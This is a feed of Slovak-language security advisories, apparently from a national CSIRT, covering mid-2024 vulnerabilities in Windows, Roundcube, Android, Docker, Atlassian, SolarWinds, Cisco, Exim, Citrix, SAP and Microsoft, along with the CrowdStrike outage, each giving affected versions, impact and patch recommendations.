Vysoko závažné zraniteľnosti CVE-2024-21302 a CVE-2024-38202 sa nachádzajú v systéme Windows Backup, vrátane podmnožiny Azure Virtual Machine SKUS, a týkajú sa zvýšenia oprávnení. Chyba umožňuje útočníkovi so základnými používateľskými oprávneniami obchádzať niektoré funkcie Virtualization Based Security (VBS), čo môže viesť k zavedeniu predtým zmiernených zraniteľností a k infiltrácii údajov chránených VBS.

Pre úspešné zneužitie zraniteľnosti CVE-2024-38202 je potrebná interakcia zo strany privilegovaného používateľa.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Zvýšenie privilégií
Exfiltrácia údajov

Odporúčania:

V súčasnosti neexistuje opravná aktualizácia, preto Microsoft odporúča pre zníženie rizika zneužitia dodržať nasledujúce kroky, ktoré nájdete tu.

Odkazy:

https://thehackernews.com/2024/08/windows-downgrade-attack-risks-exposing.html
https://www.bleepingcomputer.com/news/microsoft/windows-update-downgrade-attack-unpatches-fully-updated-systems/
https://www.tenable.com/cve/CVE-2024-38202
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21302
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38202

Zraniteľnosti v Roundcube umožňujú exfiltráciu citlivých údajov a rozposielanie e-mailov

Marian Danko — Thu, 08 Aug 2024 14:07:03 +0000

Populárna webmailová platforma Roundcube obsahuje tri vysoko závažné zraniteľnosti, ktoré by vzdialený neautentifikovaný útočník zaslaním škodlivého e-mailu mohol zneužiť na realizáciu XSS útoku, získanie perzistencie v systéme obete, krádež citlivých údajov a rozposielanie e-mailových správ.

Zraniteľné systémy:

Roundcube verzie 1.6.7, 1.5.7 a staršie

Opis zraniteľnosti:

Vo webmailovej platforme Roundcube bolo opravených niekoľko vysoko závažných zraniteľností, ktoré útočníkom umožňujú vykonávať škodlivé skripty JavaScript v prehliadači obete. Útočník môže získať perzistenciu v systéme a priebežne kradnúť e-maily, kontakty alebo exfiltrovať heslo do konta, keď ho obeť zadá. Môže tiež odosielať e-maily z konta obete.

CVE-2024-42008
Zraniteľnosť vo funkcii rcmail_action_mail_get->run() umožňujúca vykonať útok typu cross-site scripting pomocou škodlivej hlavičky Content-Type prílohy e-mailu. Obeť musí s prílohou interagovať.

CVE-2024-42009
Zraniteľnosť typu cross-site scripting funkcie message_body() v program/actions/mail/show.php súvisí s nesprávnym spracovaním sanitizovaného obsahu HTML. Pre zneužitie zraniteľnosti stačí, aby si obeť pozrela škodlivý e-mail.

CVE-2024-42010 (CVSSv3 skóre 7,5)
Zraniteľnosť vedúca k úniku informácií, ktorá súvisí s nedostatočným filtrovaním CSS, ktoré má na starosti funkcia mod_css_styles.

Zraniteľnosti odhalil Oskar Zeino-Mahmalat zo spoločnosti Sonar.

Možné škody:

Neoprávnený prístup k citlivým údajom
Vykonanie škodlivého kódu

Odporúčania:

Bezodkladná aktualizácia Roundcube aspoň na verzie 1.6.8 alebo 1.5.8.

Zdroje:
https://roundcube.net/news/2024/08/04/security-updates-1.6.8-and-1.5.8
https://www.helpnetsecurity.com/2024/08/07/cve-2024-42009-cve-2024-42008/
https://thehackernews.com/2024/08/roundcube-webmail-flaws-allow-hackers.html
https://nvd.nist.gov/vuln/detail/CVE-2024-42008
https://nvd.nist.gov/vuln/detail/CVE-2024-42009
https://nvd.nist.gov/vuln/detail/CVE-2024-42010

Aktívne zneužívaná zraniteľnosť v jadre Android

Marian Danko — Thu, 08 Aug 2024 13:58:27 +0000

Spoločnosť Google vydala balík opráv pre OS Android, ktorý okrem iného rieši vysoko závažnú zero-day zraniteľnosť jadra, umožňujúcu vzdialené vykonávanie kódu. Zraniteľnosť je pravdepodobne zneužívaná pri cielených útokoch.

Zraniteľné systémy:

Android

Opis zraniteľnosti:

CVE-2024-36971 (CVSSv3 skóre 7,8)

Vysoko závažná zraniteľnosť v jadre OS Android súvisí s nesprávnou implementáciou pravidiel read-copy update (RCU) pri riadení určitých sieťových spojení. Útočníkom umožňuje zneužiť dealokované miesto v pamäti a následne vzdialene vykonávať kód bez interakcie používateľa. Úspešné zneužitie vyžaduje oprávnenia na úrovni SYSTEM. Zraniteľnosť pravdepodobne aktívne zneužívajú poskytovatelia komerčného špionážneho malvéru pri cielených útokoch za zraniteľné zariadenia.

Zraniteľnosť objavil bezpečnostný výskumník Clement Lecigne z tímu Google Threat Analysis Group (TAG).

Spoločnosť Google opravila v príslušnom balíku pre Android ďalších 14 zraniteľností umožňujúcich zvýšenie oprávnení, spôsobenie nedostupnosti služby a získavanie informácií. Augustový balík opravuje spolu 47 zraniteľností vrátane mnohých nachádzajúcich sa v komponentoch spoločností Arm, Imagination Technologies, MediaTek a Qualcomm.

Možné škody:

Vzdialené vykonávane kódu

Odporúčania:

Bezodkladná inštalácia augustových opravných aktualizácií Android.

Zdroje:

https://source.android.com/docs/security/bulletin/2024-08-01#Android-and-Google-service-mitigations
https://nvd.nist.gov/vuln/detail/CVE-2024-36971
https://thehackernews.com/2024/08/google-patches-new-android-kernel.html
https://www.bleepingcomputer.com/news/security/google-fixes-android-kernel-zero-day-exploited-in-targeted-attacks/

Mesačný prehľad kritických zraniteľností júl 2024

Marian Danko — Tue, 06 Aug 2024 13:23:56 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci júl 2024.

Mesačný prehľad – 07/2024 PDF (278 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Návod – nastavenie 2-faktorovej autentifikácie na Google

Marian Danko — Mon, 05 Aug 2024 15:12:19 +0000

Pripravili sme si pre vás návod, ako si zabezpečíte svoj účet Google aj pred útočníkmi, ktorí poznajú vaše heslo. Podobným spôsobom sa môžete brániť aj na mnohých iných webových službách a aplikáciách, ktoré používate.

Stiahnuť si ho môžete v sekcii Metodiky a návody TU.

Kritická zraniteľnosť v Docker Engine

Marian Danko — Thu, 25 Jul 2024 14:52:16 +0000

Vývojári kontajnerizačnej technológie Docker Engine vydali bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť. CVE-2024-41110 možno zneužiť na obídenie autorizačných pluginov AuthZ a eskaláciu privilégií. Jedná sa o opätovný výskyt zraniteľnosti odstránenej v januári 2019, ktorej oprava nebola zakomponovaná do novších verzií Docker Engine 19.03 a vyššie.

Zraniteľné systémy:

Docker Engine vo verziách starších ako v23.0.14 (vrátane)
Docker Engine vo verziách starších ako v27.1.0 (vrátane)
Docker Desktop vo verziách starších ako v4.33

Pozn. Zraniteľnosť je možné zneužiť len na inštanciách využívajúcich autorizačné pluginy AuthZ. Inštancie, ktoré nevyužívajú autorizačné pluginy a všetky verzie Miranis Container Runtime nie sú zraniteľné.

Zneužitie zraniteľnosti v nástroji Docker Desktop je zložitejšie, nakoľko útočník musí disponovať prístupom k Docker API, ktoré je v štandardnej konfigurácii prístupné len pre používateľov s lokálnym prístupom k hostiteľskému systému.

Opis zraniteľnosti:

CVE-2024-41110 (CVSS skóre 10,0)

Kritická bezpečnostnú zraniteľnosť sa na nachádza v autorizačných pluginoch AuthZ, ktoré slúžia na filtrovanie prichádzajúcich API požiadaviek na základe autentifikácie a kontextu príkazov. CVE-2024-41110 možno zneužiť zaslaním špeciálne vytvorenej požiadavky s poľom Content-Length nastaveným na hodnotu 0, ktoré Docker démon preposiela na autorizačné pluginy bez tela požiadavky, čo môže viesť k ich nesprávnemu vyhodnoteniu a následnému vykonaniu príkazov.

Možné škody:

Obídenie mechanizmov autorizácie
Eskalácia privilégií

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladnú aktualizáciu zraniteľných systémov na najnovšiu verziu Docker Engine. Nakoľko aktualizácie na Docker Desktop ešte nie sú dostupné, odporúčame sledovať stránky výrobcu a po vydaní verzie 4.33 vykonať bezodkladnú aktualizáciu.

V prípadoch, kedy aktualizácia nie je možná, výrobca odporúča deaktivovať autorizačné pluginy AuthZ a limitovať prístup k Docker API len na dôveryhodné subjekty.

Zdroje:

https://www.docker.com/blog/docker-security-advisory-docker-engine-authz-plugin/

https://www.csoonline.com/article/3477530/docker-re-fixes-a-critical-authorization-bypass-vulnerability.html

https://www.bleepingcomputer.com/news/security/docker-fixes-critical-5-year-old-authentication-bypass-flaw/

https://thehackernews.com/2024/07/critical-docker-engine-flaw-allows.html

Zraniteľnosti v serveroch Atlassian

Marian Danko — Fri, 19 Jul 2024 14:59:54 +0000

Spoločnosť Atlassian vydala bezpečnostné aktualizácie svojich produktov Bamboo Data Center a Server, Confluence Data Center a Server, Jira Data Center and Server a Jira Service Management Data Center a Server, ktoré opravujú 30 zraniteľností. Najzávažnejšie zraniteľnosti nachádzajúce sa v Bamboo Data Center a Server možno zneužiť na realizáciu SSRF útokov, vzdialené vykonanie lokálnych súborov a získanie neoprávneného prístupu do systému. Ostatné zraniteľnosti možno zneužiť na zneprístupnenie služby, získanie neoprávneného prístupu do systému alebo vykonanie neoprávnených zmien v systéme.

Zraniteľné systémy:

Bamboo Data Center a Server vo verziách 9.6.0 – 9.6.3 (LTS), 9.5.0 – 9.5.4, 9.4.0 – 9.4.4, 9.3.0 – 9.3.6, 9.2.1 – 9.2.15 (LTS), 9.1.0 – 9.1.3, 9.0.0 – 9.0.4
Confluence Data Center a Server vo verziách 8.9.0 – 8.9.3, 8.8.0 – 8.8.1, 8.7.1 – 8.7.2, 8.6.0 – 8.6.2, 8.5.0 – 8.5.11 (LTS), 8.4.0 – 8.4.5, 8.3.0 – 8.3.4, 8.2.0 – 8.2.3, 8.1.0 – 8.1.4, 8.0.0 – 8.0.4, 7.20.0 – 7.20.3, 7.19.0 – 7.19.24 (LTS)
Jira Data Center a Server vo verziách 9.7.0 – 9.7.2, 9.6.0, 9.5.0 – 9.5.1, 9.4.0 – 9.4.17 (LTS), 9.3.0 – 9.3.3, 9.2.0 – 9.2.1, 9.1.0 – 9.1.1
Jira Service Management Center a Server vo verziách 5.7.0 – 5.7.2, 5.6.0, 5.5.0 – 5.5.1, 5.4.0 – 5.4.17 (LTS), 5.3.0 – 5.3.3, 5.2.0 – 5.2.1, 5.1.0 – 5.1.1

Opis zraniteľnosti:

CVE-2024-21687 (CVSS skóre 8,1)
Zraniteľnosť v produkte Bamboo Data Center a Server by vzdialený autentifikovaný útočník mohol zneužiť na zobrazenie obsahu alebo vykonanie lokálnych súborov.

CVE-2024-22262 (CVSS skóre 8,1)
CVE-2024-22262 v produkte Bamboo Data Center a Server sa nachádza v komponente org.springframework:spring-web a vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu SSRF (Server Side Request Forgery) útokov s následkom narušenia dôvernosti a integrity zraniteľných systémov.

Ostatné opravené zraniteľnosti môžu spôsobiť najmä nedostupnosť služby alebo umožňujú vykonávanie útokov XSS.

Možné škody:

Neoprávnená zmena v systém
Vykonanie škodlivého kódu
Zneprístupnenie služby
Neoprávnený prístup k citlivým údajom

Odporúčania:
Aktualizácia zraniteľných systémov na bezpečné verzie špecifikované výrobcom:

Bamboo Data Center a Server na verzie 9.6.4 (LTS) (odporúčaná verzia, len verzie Data Center), 9.2.16 (LTS)
Confluence Data Center a Server na verzie 8.9.4 (len verzie Data Center), 8.5.12 (LTS) (odporúčaná verzia), 7.19.25 (LTS)
Jira Data Center a Server na verzie 9.8.0 a novšie, 9.12.0 – 9.12.11 (LTS) (odporúčaná verzia), 9.4.18 – 9.4.24 (LTS)
Jira Service Management Center a Server na verzie 5.8.0 a novšie, 5.12.0 – 5.12.11 (LTS) (odporúčaná verzia), 5.4.18 – 5.4.24 (LTS)

Kritické zraniteľnosti v produktoch SolarWinds Access Rights Manager

Marian Danko — Fri, 19 Jul 2024 13:38:25 +0000

Spoločnosť SolarWinds vydala bezpečnostné aktualizácie produktu SolarWinds Access Rights Manager, ktoré opravujú 13 zraniteľností, z toho 8 označených ako kritické. Kritické zraniteľnosti možno zneužiť na vykonanie škodlivého kódu a získanie úplnej kontroly nad systémom. Ostatné zraniteľnosti umožňujú neoprávnený prístup do systému, neoprávnený prístup k citlivým údajom a vykonanie neoprávnených zmien v systéme.

Zraniteľné systémy:

SolarWinds Access Rights Manager vo verzii 2024.2.4 a staršej

Opis zraniteľnosti:
CVE-2024-23466, CVE-2024-23467, CVE-2024-23469, CVE-2024-23470, CVE-2024-23471, CVE-2024-23472, CVE-2024-28074, CVE-2024-23475 (CVSS skóre 9,6)
Kritické zraniteľnosti umožňujúce zneužitie vnútornej deserializácie, využitie nebezpečnej metódy a prechádzanie obsahu adresárov by autentifikovaný alebo neautentifikovaný útočník nachádzajúci sa v rovnakej sieti mohol zneužiť na vykonanie škodlivého kódu, získanie neoprávneného prístupu k citlivým údajom, zvýšenie oprávnení, mazaniu a čítaniu súborov alebo vykonanie neoprávnených zmien v systéme.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup do systému
Neoprávnený prístup k citlivým údajom
Vykonanie neoprávnených zmien v systéme
Úplné narušenie dôvernosti, integrity a dostupnosti systém

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladne aktualizovať SolarWinds Access Rights Manager na verziu 2024.3 a novšie.

Kritické zraniteľnosti v produktoch Cisco Security Email Gateway a Cisco Smart Software Manager On-Prem

Marian Danko — Fri, 19 Jul 2024 12:35:59 +0000

Aktualizované: 09.08.2024

Zraniteľné systémy:
CVE-2024-20401

Cisco Secure Email Gateway s Cisco AsyncOS vo verziách starších ako 15.5.1-055

Pozn. zraniteľnosť je možné zneužiť len na zariadeniach, na ktorých sú zapnuté funkcie „file analysis“ (v Cisco AMP) alebo „content filter“ a komponent Content Scanner Tools je vo verzii staršej ako 23.3.0.4823.

CVE-2024-20419

Cisco Smart Software Manager On-Prem vo verziách starších ako 8-202212

Pozn. produkt Cisco Smart Software Manager On-Prem vo verziách starších ako Release 7.0 sa nazýval Cisco Smart Software Manager Satellite.

Opis zraniteľnosti:

CVE-2024-20401 (CVSS skóre 9,8)
Zraniteľnosť spočíva v nesprávnom narábaní s e-mailovými prílohami a vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania e-mailov so špeciálne vytvorenými prílohami mohol zneužiť na modifikáciu obsahu ľubovoľných súborov na súborovom systéme zariadení. Útočník by tak mohol vykonať škodlivý kód, vytvoriť nových používateľov s oprávneniami úrovne root, vykonať neoprávnené zmeny v systéme alebo spôsobiť zneprístupnenie služby. Zraniteľnosť je možné zneužiť len za špecifických podmienok popísaných v časti Zraniteľné systémy.

CVE-2024-20419 (CVSS skóre 10,0)
CVE-2024-20419 spočíva v nesprávne implementovanej funkcionalite pre zmenu hesla a vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorenej HTTP požiadavky mohol zneužiť na zmenu hesla ľubovoľného používateľa a získanie neoprávneného prístupu do systému. V prípade administrátorských účtov môže získať úplnú kontrolu nad systémom.

Spoločnosť CISCO zverejnila na danú zraniteľnosť PoC (Proof of concept), je možné očakávať skenovanie a pokusy o zneužitie chyby.

Možné škody:

Neoprávnený prístup do systému
Získanie prístupu k citlivým údajom
Vykonanie neoprávnených zmien v systéme
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:
Administrátorom a používateľom odporúčame bezodkladne aktualizovať Cisco Security Email Gateway na verziu 15.5.1-055 alebo novšiu a Cisco Smart Software Manager On-Prem na verziu 8-202212 alebo novšiu.

Zdroje:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-afw-bGG2UsjH

Aktualizácia CrowdStrike Falcon spôsobila svetový výpadok služieb

Marian Danko — Fri, 19 Jul 2024 09:59:31 +0000

Aktualizácia nástroja CrowdStrike Falcon nasadeného na operačných systémoch Windows spôsobila výpadky systémov a služieb po celom svete. Existuje potenciál zneužitia situácie pre kybernetické útoky.

Zraniteľné systémy:
CrowdStrike Falcon agent/senzor vo viacerých verziách (aktuálne nešpecifikované výrobcom).

Opis činnosti:
Výpadky systémov nastali 19.7.2024 po publikovaní aktualizácie Produktu CrowdStrike Falcon. Chybu podľa spoločnosti CrowdStrike spôsobuje aktualizovaný/pridaný ovládač C-00000291*.sys. Chyba sa prejavuje Windows BSOD stop code: CRITICAL_PROCESS_DIED. Systém ostane v slučke bootovania a vypisuje hlásenie “What failed: csagent.sys”.
Bezpečnostné riziko: Situáciu môžu potenciálne zneužiť útočníci pri rôznych typoch útokov.

Závažnosť zraniteľnosti: Vysoká

Možné škody:

Narušenie dostupnosti služieb a systémov
Kritický výpadok systémov

Odporúčania:
Pokiaľ na Vašom bezpečnostnom systéme CrowdStrike Falcon problém nenastal, neaktualizujte ho a vypnite automatické aktualizácie, kým výrobca problém nevyrieši. Problém spôsobuje najnovšia aktualizácia.

Pokiaľ Vám Systém spadol (BSOD):

Spustite OS Windows v Safe Mode
Vyhľadajte: C:\Windows\System32\drivers\CrowdStrike
Vyhľadajte súbor “C-00000291*.sys” a premenujte ho na “C-00000291*.renamed” alebo ho vymažte
Vypnite automatické aktualizácie agenta CrowdStrike
Reštartujte systém

Proces môžete pre zariadenia v doméne automatizovať pomocou skupinových politík.

AKTUALIZÁCIA: Podľa vyjadrenia spoločnosti CrowdStrike oprava chybnej aktualizácie už je dostupná.

Odkazy:
https://www.ncsc.gov.ie/pdfs/CrowdStrike_BSOD_Loop_Issue.pdf
https://www.theverge.com/2024/7/19/24201717/windows-bsod-crowdstrike-outage-issue
https://cybersecuritynews.com/crowdstrike-update-bsod-loop/
https://x.com/MonThreat/status/1814224117144424937
https://www.circl.lu/pub/tr-87/
https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617

Mesačná správa CSIRT.SK – jún 2024

Marian Danko — Tue, 16 Jul 2024 15:31:33 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci jún 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 06/2024 PDF (876 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Kritická zraniteľnosť servera Exim

Marian Danko — Mon, 15 Jul 2024 12:57:01 +0000

Mailový server Exim obsahuje zraniteľnosť, ktorá umožňuje útočníkom doručiť obetiam do mailboxu súbory so zakázanou príponou. Ochranou servera prejdú aj škodlivé spustiteľné súbory.

Zraniteľné systémy:

Server Exim verzia 4.97.1 a staršie

Opis činnosti:

CVE-2024-39929 (CVSS skóre 9,1)

Kritická zraniteľnosť mailového servera Exim spočíva v nesprávnom spracovaní viacriadkových názvov príloh v hlavičkách v súlade s RFC 2231. Chyba umožňuje útočníkom obísť bezpečnostný mechanizmus na blokovanie príloh s určitými typmi prípon a doručiť obetiam spustiteľné škodlivé prílohy. Pre úspešné dokončenie útoku musí obeť prílohu e-mailu otvoriť.

Závažnosť zraniteľnosti: Vysoká

Možné škody:

Obídenie bezpečnostných prvkov
Vykonanie kódu
Narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Bezodkladná aktualizácia servera Exim aspoň na verziu 4.98.

Odkazy:

https://thehackernews.com/2024/07/critical-exim-mail-server-vulnerability.html

https://lists.exim.org/lurker/message/20240710.155945.8823670d.pt.html

https://censys.com/cve-2024-39929/

Citrix opravila viacero zraniteľností svojich produktov

Marian Danko — Wed, 10 Jul 2024 19:56:19 +0000

Spoločnosť Citrix opravila kritické a vysoko závažné zraniteľnosti vo viacerých svojich produktoch. Zraniteľnosti umožňujú útočníkom získať privilégiá na úrovni SYSTEM, presmerovať používateľov na škodlivé webstránky, získať citlivé údaje alebo spôsobiť nedostupnosť systému.

Zraniteľné systémy:

NetScaler ADC a NetScaler Gateway 14.1 staršie ako 14.1-25.53
NetScaler ADC a NetScaler Gateway 13.1  staršie ako  13.1-53.17
NetScaler ADC a NetScaler Gateway 13.0  staršie ako 13.0-92.31
NetScaler ADC 13.1-FIPS staršie ako 13.1-37.183
NetScaler ADC 12.1-FIPS staršie ako 12.1-55.304
NetScaler ADC 12.1-NDcPP staršie ako 12.1-55.304

NetScaler Console 14.1  staršie ako 14.1-25.53
NetScaler Console 13.1  staršie ako 13.1-53.22
NetScaler Console 13.0  staršie ako 13.0-92.31
NetScaler SVM 14.1 staršie ako 14.1-25.53
NetScaler SVM 13.1 staršie ako 13.1-53.17
NetScaler SVM 13.0 staršie ako 13.0-92.31
NetScaler Agent 14.1  staršie ako  14.1-25.53
NetScaler Agent 13.1  staršie ako 13.1-53.22
NetScaler Agent 13.0  staršie ako 13.0-92.31

Citrix Workspace pre HTML5 staršie ako 2404.1

Citrix Provisioning staršie ako 2402
Citrix Provisioning staršie ako 2203 LTSR CU5
Citrix Provisioning staršie ako 1912 LTSR CU9

Citrix Virtual Apps and Desktops staršie ako 2402
Citrix Virtual Apps and Desktops 1912 LTSR staršie ako CU9
Citrix Virtual Apps and Desktops 2203 LTSR staršie ako CU5

Citrix Workspace pre Windows staršie ako 2403.1
Citrix Workspace pre Windows staršie ako 2402 LTSR

Opis činnosti:

Netscaler ADC a Gateway

CVE-2024-5491 (CVSS v4 skóre 7,1) – ak má zariadenie nakonfigurované SNMP (NSIP/SNIP), môže útočník spôsobiť nedostupnosť služby.

CVE-2024-5492 (CVSS v4 skóre 5,1) – „open redirect“, vzdialený neautentifikovaný útočník môže presmerovať používateľov na škodlivé webstránky, pokiaľ sú na sieti s NSIP.

NetScaler Console, Agent a SVM

CVE-2024-6235 (CVSS v4 skóre 9,4) – útočník s prístupom ku IP adrese Netscaler Console môže získať citlivé informácie.

CVE-2024-6236 (CVSS v4 skóre 7,1) – útočník s prístupom ku IP adrese Netscaler Console, Agent alebo SVM môže spôsobiť nedostupnosť služby.

Citrix Workspace pre HTML5

CVE-2024-6148 (CVSS v4 skóre 5,3) – pokiaľ je v prostredí nakonfigurovaná služba Global App Configuration Service (GACS), útočník môže obísť jej nastavenia politiky.

CVE-2024-6149 (CVSS v4 skóre 4,8) – ak je útočník prihlásený do obchodu, v ktorom môže spustiť reláciu HTML5, dokáže presmerovať používateľov na zraniteľné webstránky.

Citrix Provisioning

CVE-2024-6150 (CVSS v4 skóre 4,8) – pokiaľ má útočník prístup k súboru PVSboot.ini, dokáže spôsobiť výpadok Target VM, aj keď nemá administrátorské oprávnenia.

Windows Virtual Delivery Agent for CVAD a Citrix DaaS

CVE-2024-6151 (CVSS v4 skóre 8,5) – ak má útočník lokálny prístup ku zraniteľnému systému, dokáže si zvýšiť oprávnenia na úroveň SYSTEM.

Citrix Workspace pre Windows

CVE-2024-6286 (CVSS v4 skóre 8,5) – ak má útočník lokálny prístup ku zraniteľnému systému, dokáže si zvýšiť oprávnenia na úroveň SYSTEM.

Závažnosť zraniteľnosti: Vysoká

Možné škody:

Únik citlivých informácií
Nedostupnosť služby
Eskalácia oprávnení

Odporúčania:

Bezodkladná aktualizácia na:

NetScaler ADC a NetScaler Gateway 14.1-25.53 a novšie
NetScaler ADC a NetScaler Gateway 13.1-53.17 a novšie z 13.1
NetScaler ADC a NetScaler Gateway 13.0-92.31 a novšie z 13.0 
NetScaler ADC 13.1-FIPS 13.1-37.183 a novšie z 13.1-FIPS 
NetScaler ADC 12.1-FIPS 12.1-55.304 a novšie z 12.1-FIPS 
NetScaler ADC 12.1-NDcPP 12.1-55.304 a novšie z 12.1-NDcPP

NetScaler Console 14.1-25.53 a novšie z 14.1
NetScaler Console 13.1-53.22 a novšie z 13.1
NetScaler Console 13.0-92.31 a novšie z 13.0
NetScaler SVM 14.1-25.53 a novšie z 14.1
NetScaler SVM 13.1-53.17 a novšie z 13.1
NetScaler SVM 13.0-92.31 a novšie z 13.0
NetScaler Agent 14.1-25.53 a novšie z 14.1
NetScaler Agent 13.1-53.22 a novšie z 13.1
NetScaler Agent 13.0-92.31 a novšie z 13.0

Citrix Workspace pre HTML5 2404.1 a novšie

Citrix Provisioning 2402 a novšie
Citrix Provisioning 2203 LTSR CU5 a novšie
Citrix Provisioning 1912 LTSR CU9 a novšie

Citrix Virtual Apps and Desktops 2402 a novšie
Citrix Virtual Apps and Desktops 1912 LTSR CU9 a novšie CU
Citrix Virtual Apps and Desktops 2203 LTSR CU5 a novšie CU
Citrix Virtual Apps and Desktops 2402 LTSR

Citrix Workspace pre Windows 2403.1 a novšie
Citrix Workspace pre Windows 2402 LTSR a novšie

Odkazy:

Vysoko závažné zraniteľnosti SAP

Marian Danko — Wed, 10 Jul 2024 19:53:32 +0000

Spoločnosť SAP vydala v júli 2024 balík opráv pre svoje produkty opravujúcich 16 zraniteľností v aplikáciách PDCE, Commerce, Landscape Management, Document Builder, NetWeaver Knowledge Management XMLEditor a ďalších. 2 z nich sú označené ako vysoko závažné. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi čítať všeobecné údaje z tabuľky alebo pristupovať k nesprávne nakonfigurovaným stránkam. Na zraniteľnosť upozornila spoločnosť Onapsis Research Labs (ORL).

Zraniteľné systémy:

SAP PDCE– S4CORE 102, 103, S4COREOP 104, 105, 106, 107, 108
SAP Commerce– HY_COM 2205, COM_CLOUD 2211
SAP Landscape Management – VCM 3.00
SAP Document Builder – S4CORE 100, 101, S4FND 102, 103, 104, 105, 106, 107, 108, SAP_BS_FND 702, 731, 746, 747, 748
SAP NetWeaver Knowledge Management XMLEditor,– KMC-WPC 7.50
SAP CRM WebClient UI – S4FND 102, 103, 104, 105, 106, 107, 108, WEBCUIF 701, 731, 746, 747, 748, 800, 801
SAP Business Warehouse – Business Planning and Simulation, – SAP_BW 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, SAP_BW_VIRTUAL_COMP 701
SAP S/4HANA Finance (Advanced Payment Management),– S4CORE 107, 108
SAP Business Workflow (WebFlow Services)– SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758
SAP GUI for Windows– BC-FES-GUI 8
SAP Transportation Management (Collaboration Portal)– SAPTMUI 140, 150, 160, 170
SAP Enable Now– WPB_MANAGER_CE 10, WPB_MANAGER_HANA 10, ENABLE_NOW_CONSUMP_DEL 1704

Opis činnosti:

CVE-2024-39592 (CVSS skóre 7,7 )

Vysoko závažná zraniteľnosť CVE-2024-39592, chýbajúca kontrola autorizácie, sa nachádza v nástroji PDCE (Product Design Cost Estimating). Chyba umožňuje vzdialenému útočníkovi čítať všeobecné údaje z tabuľky, čo ovplyvňuje dôvernosť systému.

CVE-2024-39597 (CVSS skóre 7,2 )

Chyba CVE-2024-39597 sa týka nesprávnej autorizácie v systéme SAP Commerce, čo umožňuje útočníkovi pristupovať k nesprávne nakonfigurovaným stránkam. Úspešné zneužitie si vyžaduje aby útočník zneužil funkciu zabudnutého hesla pre získanie prístupu na stránku, pre ktorú je aktivované prihlásenie a registrácia bez schválenia. Pokiaľ nie je lokalita izolovaná, umožňuje to prístup aj k iným neizolovaným lokalitám.

Ostatné zraniteľnosti so strednou závažnosťou sa nachádzajú v aplikáciách Landscape Management, Document Builder, NetWeaver, CRM, Business Warehouse, S/4HANA, Business Workflow, GUI for Windows, Transportation Management a Enable Now.

Závažnosť zraniteľnosti: Závažná

Možné škody:

Narušenie dostupnosti

Odporúčania:

Odporúčame bezodkladnú aktualizáciu na najnovšiu možnú verziu.

Pre zmiernenie zraniteľnosti CVE-2024-39592 odporúčame vypnúť zraniteľný modul.

Ako dočasné riešenie pre zraniteľnosť CVE-2024-39597 spoločnosť SAP odporúča vypnúť registráciu pre dotknuté izolované lokality Composable Storefront B2B a pre všetky neizolované lokality Composable Storefront B2B, ak je skoré prihlásenie povolené aspoň na jednej z týchto neizolovaných lokalít.

Odkazy:

https://www.securityweek.com/sap-patches-high-severity-vulnerabilities-in-pdce-commerce/

https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/knowledge-base/security-notes-news/2024%2007%20Patch%20Day%20Blog%20V1.pdf

https://onapsis.com/blog/sap-patch-day-july-2024/

Microsoft v rámci júlového Patch Tuesday opravil kritické a zero-day zraniteľnosti

Marian Danko — Wed, 10 Jul 2024 13:37:47 +0000

Spoločnosť Microsoft vydala v júli 2024 balík opráv pre portfólio svojich produktov opravujúci 139 zraniteľností, z ktorých 54 umožňuje vzdialené vykonávanie kódu. Kritické zraniteľnosti sa nachádzajú v produkte Microsoft SharePoint Server a komponentoch Windows Imaging Component a Windows Remote Desktop Licensing Service. Zero-day zraniteľnosti s označením CVE-2024-38080 a CVE-2024-38112 sú aktívne zneužívané útočníkmi.

Zraniteľné systémy:

.NET 8.0
Azure CycleCloud 7.9.0
Azure CycleCloud 7.9.1
Azure CycleCloud 7.9.10
Azure CycleCloud 7.9.11
Azure CycleCloud 7.9.2
Azure CycleCloud 7.9.3
Azure CycleCloud 7.9.4
Azure CycleCloud 7.9.5
Azure CycleCloud 7.9.6
Azure CycleCloud 7.9.7
Azure CycleCloud 7.9.8
Azure CycleCloud 7.9.9
Azure CycleCloud 8.0.0
Azure CycleCloud 8.0.1
Azure CycleCloud 8.0.2
Azure CycleCloud 8.1.0
Azure CycleCloud 8.1.1
Azure CycleCloud 8.2.0
Azure CycleCloud 8.2.1
Azure CycleCloud 8.2.2
Azure CycleCloud 8.3.0
Azure CycleCloud 8.4.0
Azure CycleCloud 8.4.1
Azure CycleCloud 8.4.2
Azure CycleCloud 8.5.0
Azure CycleCloud 8.6.0
Azure DevOps Server 2022.1
Azure Kinect SDK
Azure Network Watcher VM Extension for Windows
Microsoft .NET Framework 2.0 Service Pack 2
